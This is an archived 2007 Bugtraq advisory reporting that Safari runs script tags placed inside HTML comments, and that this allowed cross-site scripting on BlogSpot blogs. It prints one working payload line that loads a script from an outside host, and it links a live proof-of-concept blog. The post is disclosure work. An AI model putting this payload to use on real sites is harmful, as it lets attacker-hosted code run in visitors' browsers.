lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 23 Jan 2007 00:44:13 -0700
From: Jose Avila III <jose@...ra.com>
To: bugtraq@...urityfocus.com
Cc: Jose Avila <jose@...ra.com>
Subject: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability

Overview:

Safari on occasions may improperly parse the source of an HTML  
document, which can lead to the execution of html tags within  
comments. This can become dangerous when input filters allow html  
tags within comments, as they will get parsed and executed under  
certain circumstances.

Details:

In some cases you can cause Appleā€™s Safari browser to execute code  
when it should not be executed. In the following example everything  
within the comment, in theory should never be executed; however,  
safari decides to execute the script tag.

<title>myblog<!--</title></head><body><script src=http://beanfuzz.com/ 
bean.js> --></title>

Blogs hosted on BlogSpot.com have filter mechanisms for their input;  
however, they will allow you to inject anything within comments. This  
made it possible to cross site script blogspot.com. Note: Only Safari  
viewers will be affected.

Proof of concept: http://dirtybean1234.blogspot.com/

Initial release of vulnerability: http://www.beanfuzz.com/wordpress/? 
p=99

Vendor Response:

I was unable to get a response from the vendor in regards to this issue

Questions / Comments:
Jose (at) onzra (dot) com

----
Register for my RSA 2007 Training Course
"Creative Web Protocol Attacks, Beyond Web Hacking"
February 4, 5 2007 San Francisco
https://cm.rsaconference.com/US07/catalog/eventguide/publicSchedule.jsp




Powered by blists - more mailing lists